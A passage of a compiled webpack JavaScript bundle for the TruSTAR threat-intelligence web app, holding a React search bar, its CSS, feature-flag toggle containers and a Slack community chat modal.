          prevPathname = _ref4$pathname === undefined ? '' : _ref4$pathname;

      var _ref5 = this.props.location || {},
          _ref5$pathname = _ref5.pathname,
          crtPathname = _ref5$pathname === undefined ? '' : _ref5$pathname;

      if (prevPathname !== crtPathname) {
        this.setState({ isInReports: Object(__WEBPACK_IMPORTED_MODULE_16__utils_route__["a" /* isReportsPage */])(crtPathname) });
      }
    }
  }, {
    key: 'render',
    value: function render() {
      var _this2 = this;

      var _state = this.state,
          focused = _state.focused,
          isInReports = _state.isInReports;
      var _props = this.props,
          pristine = _props.pristine,
          palette = _props.palette,
          searchValue = _props.searchValue;

      // NOTE: I used `formFocused` as a class name just in case 'focused' would
      // cause issues with the lower components that also get the focused class

      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { className: cx('SearchBoxContainer'), 'data-selector': 'OmnisearchBoxIII' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'form',
          {
            'data-selector': 'OmnisearchBoxI',
            className: cx('SearchBox', { formFocused: focused }),
            onSubmit: this.handleSubmit
          },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'div',
            { className: cx('control-container') },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_9_redux_form_immutable__["Field"], {
              type: 'text',
              name: SEARCH_KEY,
              component: 'input',
              id: '@@_Search_Bar',
              onFocus: this.onFocus,
              onBlur: this.onBlur,
              onKeyDown: this.handleKeyDown,
              'data-selector': 'OmnisearchBoxII',
              ref: function ref(el) {
                _this2.input = el;
              },
              placeholder: 'Search by malware, IP address, email...'
            }),
            isInReports && searchValue && searchValue.length >= NUMBER_OF_CHARACTER_LIMIT && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
              __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__["C" /* TooltipWrapper */],
              {
                autohide: true,
                forceOpen: true,
                className: cx('wildcard-search-message-container'),
                id: 'search-bar__wildcard-search-message',
                placement: 'bottom',
                tooltip: __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                  StyledDefaultTooltip,
                  null,
                  'Search terms longer than 20 characters will be performed with a wildcard automatically appended at the end of the search term for all report searches. Indicator searches however will perform a full search irrespective of the length of the search term. Click ',
                  __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
                    'a',
                    { rel: 'noopener noreferrer', target: '_blank', href: 'https://support.trustar.co/article/0f8zd89r7u-searching#using_long_search_terms' },
                    'here'
                  ),
                  ' for more details.'
                )
              },
              __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__["o" /* Icon */], { className: cx('icon'), icon: __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__["s" /* IconLookup */].NOTIFICATION_CIRCLE })
            ),
            !pristine && __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_11_trustar_2_0_components_Button__["e" /* IconButtonPure */], {
              small: true,
              strictStyle: false,
              fill: 'none',
              icon: __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components__["s" /* IconLookup */].CROSS2,
              type: 'button',
              className: cx('icon', 'close-icon'),
              onClick: this.onReset
            })
          )
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          { className: cx('searchButtonEnd'), onClick: this.handleSubmit },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](SearchIcon, { color: palette.iconFillWhite })
        )
      );
    }
  }]);

  return SearchBox;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

var selector = Object(__WEBPACK_IMPORTED_MODULE_9_redux_form_immutable__["formValueSelector"])(FORM_NAME);

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["compose"])(Object(__WEBPACK_IMPORTED_MODULE_6_react_redux__["connect"])(function (state) {
  return {
    palette: {
      logoFill: '#3568D5',
      iconFill: '#979BA6',
      iconFillWhite: '#fff'
    },
    searchValue: selector(state, SEARCH_KEY)
  };
}, function (dispatch) {
  return {
    onSubmit: function onSubmit(values) {
      var search = (values.get(SEARCH_KEY) || '').trim();
      if (search.length < 3) {
        var warning = 'Search term must be at least 3 characters long.';
        dispatch(__WEBPACK_IMPORTED_MODULE_15_modules_alerts__["actions"].error(warning));
      } else {
        dispatch(__WEBPACK_IMPORTED_MODULE_14_modules_search__["actions"].triggerSearch(search));
      }
    },
    clearSearch: function clearSearch() {
      dispatch(__WEBPACK_IMPORTED_MODULE_14_modules_search__["actions"].resetSearch());
    }
  };
}), Object(__WEBPACK_IMPORTED_MODULE_9_redux_form_immutable__["reduxForm"])({
  form: FORM_NAME
}), __WEBPACK_IMPORTED_MODULE_4_react_router__["withRouter"])(SearchBox));

/***/ }),
/* 3670 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3671);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../../node_modules/css-loader/index.js??ref--2-1!../../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../../node_modules/stylus-loader/index.js!./SearchBar.styl", function() {
			var newContent = require("!!../../../../node_modules/css-loader/index.js??ref--2-1!../../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../../node_modules/stylus-loader/index.js!./SearchBar.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3671 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".SearchBar__searchButtonEnd__1GnUYl {\n  height: 3.833333333rem;\n  width: 5.833333333rem;\n  display: inline-flex;\n  justify-content: center;\n  align-items: center;\n  background-color: #221f20;\n  color: #fff;\n  border-bottom-right-radius: 4px;\n  border-top-right-radius: 4px;\n}\n.SearchBar__searchButtonEnd__1GnUYl:hover {\n  background-color: #8ea0ba;\n  cursor: pointer;\n}\n.SearchBar__searchIcon__1fRO7B {\n  position: absolute;\n  left: 1.666666667rem;\n  top: 50%;\n  -webkit-transform: translateY(-50%);\n          transform: translateY(-50%);\n}\n.SearchBar__SearchBoxContainer__emMoax {\n  display: flex;\n  align-items: center;\n  width: 50%;\n  height: 3.833333333rem;\n  margin-left: 1.666666667rem;\n}\n.SearchBar__SearchBoxContainer__emMoax .SearchBar__searchHelp__3himEe {\n  position: absolute;\n  opacity: 0;\n  top: 5rem;\n  font-size: 1rem;\n  pointer-events: none;\n}\n.SearchBar__SearchBoxContainer__emMoax .SearchBar__searchHelp__3himEe.SearchBar__formFocused__2c26Az {\n  pointer-events: auto;\n  opacity: 1;\n  transition: opacity 1000ms ease;\n  color: #d9d9d9;\n}\n.SearchBar__SearchBox__15Zmnt {\n  background: #f2f2f2;\n  border-radius: 4px 0px 0px 4px;\n  z-index: 18;\n  transition: -webkit-transform 350ms ease-out;\n  transition: transform 350ms ease-out;\n  transition: transform 350ms ease-out, -webkit-transform 350ms ease-out;\n  width: 100%;\n  height: 100%;\n}\n.SearchBar__SearchBox__15Zmnt .SearchBar__control-container__ZXQi8N {\n  display: inline-flex;\n  align-items: center;\n  width: 100%;\n  height: 100%;\n}\n.SearchBar__SearchBox__15Zmnt input {\n  flex: 1;\n  height: 100%;\n  padding: 0 4.333333333rem;\n  border: none;\n  background-color: transparent;\n  color: #4a4a4a;\n}\n.SearchBar__SearchBox__15Zmnt input::-webkit-input-placeholder {\n  color: #4a4a4a;\n}\n.SearchBar__SearchBox__15Zmnt input:-ms-input-placeholder {\n  color: #4a4a4a;\n}\n.SearchBar__SearchBox__15Zmnt input::-ms-input-placeholder {\n  color: #4a4a4a;\n}\n.SearchBar__SearchBox__15Zmnt input::placeholder {\n  color: #4a4a4a;\n}\n.SearchBar__SearchBox__15Zmnt input:focus {\n  color: #050505;\n}\n.SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz {\n  background: transparent;\n  padding: 0;\n  font-size: 1.167rem;\n  color: #44546a;\n}\n.SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz:hover {\n  color: #d13f19;\n}\n.SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz i:hover {\n  color: #d13f19;\n}\n.SearchBar__SearchBox__15Zmnt .SearchBar__wildcard-search-message-container__GwHQZj,\n.SearchBar__SearchBox__15Zmnt .SearchBar__close-icon__3qEa3E {\n  margin-right: 1.666666667rem;\n}\n.dark .SearchBar__SearchBox__15Zmnt {\n  background: #565656;\n  border: 1px solid transparent;\n}\n.dark .SearchBar__SearchBox__15Zmnt input {\n  color: #fff;\n}\n.dark .SearchBar__SearchBox__15Zmnt input:focus {\n  color: #fff;\n  border-color: #7989a3;\n}\n.dark .SearchBar__SearchBox__15Zmnt input::-webkit-input-placeholder {\n  color: #fff;\n}\n.dark .SearchBar__SearchBox__15Zmnt input:-ms-input-placeholder {\n  color: #fff;\n}\n.dark .SearchBar__SearchBox__15Zmnt input::-ms-input-placeholder {\n  color: #fff;\n}\n.dark .SearchBar__SearchBox__15Zmnt input::placeholder {\n  color: #fff;\n}\n.dark .SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz {\n  color: #d8d8d8;\n}\n.dark .SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz:hover {\n  color: #d13f19;\n}\n.dark .SearchBar__SearchBox__15Zmnt .SearchBar__icon__wSjUwz i:hover {\n  color: #d13f19;\n}\n.dark .SearchBar__searchButtonEnd__1GnUYl {\n  background-color: #7989a3;\n  color: #fff;\n}\n", ""]);

// exports
exports.locals = {
	"searchButtonEnd": "SearchBar__searchButtonEnd__1GnUYl",
	"searchIcon": "SearchBar__searchIcon__1fRO7B",
	"SearchBoxContainer": "SearchBar__SearchBoxContainer__emMoax",
	"searchHelp": "SearchBar__searchHelp__3himEe",
	"formFocused": "SearchBar__formFocused__2c26Az",
	"SearchBox": "SearchBar__SearchBox__15Zmnt",
	"control-container": "SearchBar__control-container__ZXQi8N",
	"icon": "SearchBar__icon__wSjUwz",
	"wildcard-search-message-container": "SearchBar__wildcard-search-message-container__GwHQZj",
	"close-icon": "SearchBar__close-icon__3qEa3E"
};

/***/ }),
/* 3672 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return isReportsPage; });
/**
 * Returns `true` if the provided `pathname` corresponds to a reports page.
 */
var isReportsPage = function isReportsPage() {
  var pathname = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';

  var IS_REPORTS_PAGE_REG_EXP = /reports/gi;

  return IS_REPORTS_PAGE_REG_EXP.test(pathname);
};

/***/ }),
/* 3673 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export VerticalSeperator */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);


var style = {
  height: '51px',
  width: '0px',
  border: '1px solid #d8d8d8',
  boxSizing: 'border-box',
  margin: '0 25px'
};

var VerticalSeperator = function VerticalSeperator(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('span', { style: style });
};

/***/ }),
/* 3674 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__.p + "favicon.ico";

/***/ }),
/* 3675 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SideMenuLink; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router__ = __webpack_require__(98);



var SideMenuLink = Object(__WEBPACK_IMPORTED_MODULE_0_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_1_react_router__["Link"]).withConfig({
  displayName: 'SideMenuLink',
  componentId: 'sc-14hahrq-0'
})(['&&{display:block;padding:0.5rem 2rem 0.5rem 0.65rem;min-width:11rem;text-align:left;border-left:0.35rem solid transparent;color:', ';font-size:1.167rem;}&&:hover{color:', ';background:', ';border-color:', ';a{color:', ';}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.TEXT;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.TEXT_HOVER;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.BACKGROUND_HOVER;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.SIDE_NAV_BAR_HOVER.hex;
}, function (_ref5) {
  var theme = _ref5.theme;
  return theme.ThemeColors.SIDE_NAV_DROPRIGHT_MENU_ITEM.TEXT;
});

/* unused harmony default export */ var _unused_webpack_default_export = (SideMenuLink);

/***/ }),
/* 3676 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ToggleFeature; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_features__ = __webpack_require__(181);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





/*

`ToggleFeature` is a smart React container that renders its children when the
feature matches a certain value (usually `on`). The ToggleFeature container
is connected to Redux which has all of the enabled featurse preloaded. There is
an optional `untoggledComponent` prop which will render if the match fails.

Matching happens with the javascript `String.match` function which also accepts
a regular expression.  Use at your own peril.

See the `ToggleFeatureView` Container to turn on/off elements at the React
Router level.

How to Use:
```
import { ToggleFeature } from 'trustar-2.0/containers/features';
import { flags as Flags, treatments as Treatments } from 'modules/features';

 <ToggleFeature feature={Flags.DASHBOARD_ENABLED} match={treatments.ON}>
    <NavLink
      name={'Dashboard'}
      to='/dashboard'
      selector='DashboardLink'
      icon={<Icon icon={IconLookup.DB} />}
    />
 </ToggleFeature>
```
*/
var ToggleFeatureComponent = function (_React$Component) {
  _inherits(ToggleFeatureComponent, _React$Component);

  function ToggleFeatureComponent() {
    _classCallCheck(this, ToggleFeatureComponent);

    return _possibleConstructorReturn(this, (ToggleFeatureComponent.__proto__ || Object.getPrototypeOf(ToggleFeatureComponent)).apply(this, arguments));
  }

  _createClass(ToggleFeatureComponent, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          flagTreatment = _props.flagTreatment,
          match = _props.match,
          untoggledComponent = _props.untoggledComponent,
          children = _props.children;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.Fragment,
        null,
        match.match(flagTreatment) ? children : untoggledComponent
      );
    }
  }]);

  return ToggleFeatureComponent;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

ToggleFeatureComponent.defaultProps = {
  untoggledComponent: __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Fragment, null)
};


var mapState = function mapState(state, ownProps) {
  return {
    flagTreatment: __WEBPACK_IMPORTED_MODULE_2_modules_features__["d" /* getters */].getFlagTreatment(ownProps.feature)(state)
  };
};

var ToggleFeature = Object(__WEBPACK_IMPORTED_MODULE_1_react_redux__["connect"])(mapState)(ToggleFeatureComponent);

/* unused harmony default export */ var _unused_webpack_default_export = (ToggleFeature);

/***/ }),
/* 3677 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export mapStateToProps */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ToggleFeatureView; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_features__ = __webpack_require__(181);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_profile__ = __webpack_require__(140);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__FeatureNotEnabledView__ = __webpack_require__(1492);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_app__ = __webpack_require__(179);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }









var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:App'); // eslint-disable-line no-unused-vars



/*

The `ToggleFeatureView` is a smart React Router View which renders its
routes conditionally based on a feature flag treatment.  If a feature treatment
matches the 'match' condition, then the `toggledComponent` will render.  If not, the `untoggledComponent` will render.

See the `ToggleFeature` Container to turn on/off elements at the React
render level.

How to use:
```
import { Route } from 'react-router';
import {
  ToggleFeatureView,
  FeatureNotEnabledView
} from 'trustar-2.0/containers/features';
import { flags as Flags, treatments as Treatments } from 'modules/features';

<Route path='/'>
  <Route
          path='dashboard'
          component={ToggleFeatureView}
          toggledComponent={DashboardContainer}
          untoggledComponent={FeatureNotEnabledView}
          feature={Flags.DASHBOARD_ENABLED}
          match={treatments.ON}
        />
</Route>
```
*/

var ToggleFeatureViewComponent = function (_React$Component) {
  _inherits(ToggleFeatureViewComponent, _React$Component);

  function ToggleFeatureViewComponent() {
    _classCallCheck(this, ToggleFeatureViewComponent);

    return _possibleConstructorReturn(this, (ToggleFeatureViewComponent.__proto__ || Object.getPrototypeOf(ToggleFeatureViewComponent)).apply(this, arguments));
  }

  _createClass(ToggleFeatureViewComponent, [{
    key: 'shouldComponentUpdate',
    value: function shouldComponentUpdate(nextProps, nextState) {
      return !(this.props.loadingTreatments === nextProps.loadingTreatments && this.props.route.feature === nextProps.route.feature && this.props.route.match === nextProps.route.match && this.props.flagTreatment === nextProps.flagTreatment);
    }
  }, {
    key: 'render',
    value: function render() {
      var _props = this.props,
          flagTreatment = _props.flagTreatment,
          loadingTreatments = _props.loadingTreatments,
          otherProps = _objectWithoutProperties(_props, ['flagTreatment', 'loadingTreatments']);

      var match = this.props.route.match;


      var ToggledComponent = this.props.route.toggledComponent;
      var UntoggledComponent = this.props.route.untoggledComponent;

      if (loadingTreatments) {
        return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](__WEBPACK_IMPORTED_MODULE_6__FeatureNotEnabledView__["b" /* FeatureVerificationComponent */], null);
      }

      return match.match(flagTreatment) ? __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](ToggledComponent, otherProps) : __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](UntoggledComponent, otherProps);
    }
  }]);

  return ToggleFeatureViewComponent;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

var mapStateToProps = function mapStateToProps(state, ownProps) {
  var flagTreatment = __WEBPACK_IMPORTED_MODULE_4_modules_features__["d" /* getters */].getFlagTreatment(ownProps.route.feature)(state);

  var loadingTreatments = __WEBPACK_IMPORTED_MODULE_4_modules_features__["d" /* getters */].loading(state) || __WEBPACK_IMPORTED_MODULE_5_modules_profile__["getters"].loading(state);

  return {
    loadingTreatments: loadingTreatments,
    flagTreatment: __WEBPACK_IMPORTED_MODULE_4_modules_features__["d" /* getters */].getFlagTreatment(ownProps.route.feature)(state)
  };
};

var ToggleFeatureView = Object(__WEBPACK_IMPORTED_MODULE_2_react_redux__["connect"])(mapStateToProps)(ToggleFeatureViewComponent);

/***/ }),
/* 3678 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export PureSlackCommunityChatModal */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return connectedModal; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_components__ = __webpack_require__(295);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_chat_actions__ = __webpack_require__(1297);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_chat_getters__ = __webpack_require__(1298);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_chat_constants__ = __webpack_require__(1299);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_app_constants__ = __webpack_require__(172);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_trustar_2_0_components_Button_ButtonGroup__ = __webpack_require__(401);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_immutable__ = __webpack_require__(1);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var debug = __WEBPACK_IMPORTED_MODULE_3_debug___default()('app:components:SlackCommunityChatModal'); // eslint-disable-line no-unused-vars












// Style for Main Components (things you may export)
var StyledSlackCommunityChatModal = Object(__WEBPACK_IMPORTED_MODULE_2_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_5_trustar_components__["i" /* Modal */]).withConfig({
  displayName: 'SlackCommunityChatModal__StyledSlackCommunityChatModal',
  componentId: 'sc-173op71-0'
})(['width:41rem;padding:0rem;border-radius:1px;color:', ';background-color:', ';.modal-title{color:', ';background:', ';}.loading-spinner{padding:1rem;}h5{padding:1rem;margin:0;}'], function (_ref) {
  var theme = _ref.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref4) {
  var theme = _ref4.theme;
  return theme.ThemeColors.LIGHT_GRAY_SURFACE.hex;
});

var initialValues = {
  isOpen: false
};

// Bindings

var SlackCommunityChatModal = function (_Component) {
  _inherits(SlackCommunityChatModal, _Component);

  function SlackCommunityChatModal() {
    var _ref5;

    var _temp, _this, _ret;

    _classCallCheck(this, SlackCommunityChatModal);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref5 = SlackCommunityChatModal.__proto__ || Object.getPrototypeOf(SlackCommunityChatModal)).call.apply(_ref5, [this].concat(args))), _this), _this.showMessageForStatus = function (statusObject) {
      var status = statusObject.status,
          workspaceUrl = statusObject.workspaceUrl;


      if (status === __WEBPACK_IMPORTED_MODULE_9_modules_chat_constants__["b" /* USER_STATUSES_FOR_SLACK_COMMUNITY */].USER_ALREADY_EXISTS) {
        return statusMessagesToUser.USER_ALREADY_EXISTS(workspaceUrl);
      }

      return statusMessagesToUser[status] || statusMessagesToUser.DEFAULT;
    }, _this.onToggleModal = function () {
      var _this$props = _this.props,
          resetChatModal = _this$props.resetChatModal,
          onExitModal = _this$props.onExitModal;

      resetChatModal();
      onExitModal();
    }, _this.goToSlackCommunity = function (resendEmail) {
      var requestToJoinCommunityChat = _this.props.requestToJoinCommunityChat;
      // TODO Validation? Reduce useless calls?

      requestToJoinCommunityChat(resendEmail);
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(SlackCommunityChatModal, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var _props = this.props,
          isOpen = _props.isOpen,
          slackInvitationStatus = _props.slackInvitationStatus,
          joinRequestInProgress = _props.joinRequestInProgress;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledSlackCommunityChatModal,
        { isOpen: isOpen, onToggleModal: this.onToggleModal },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_5_trustar_components__["k" /* NuModalTitle */],
          { className: 'modal-title' },
          'TruSTAR Community Chat'
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          null,
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'h5',
            null,
            ' ',
            this.showMessageForStatus(slackInvitationStatus),
            ' '
          )
        ),
        joinRequestInProgress ? __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_8_trustar_2_0_components__["z" /* Spinner */], { className: 'loading-spinner', inFlexContainer: true }) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(ModalBottomButtonBar, { slackInvitationStatus: slackInvitationStatus, onExitModal: this.onToggleModal, goToSlackCommunity: this.goToSlackCommunity })
      );
    }

    // ----Methods----

  }]);

  return SlackCommunityChatModal;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// Helper Components and Utils


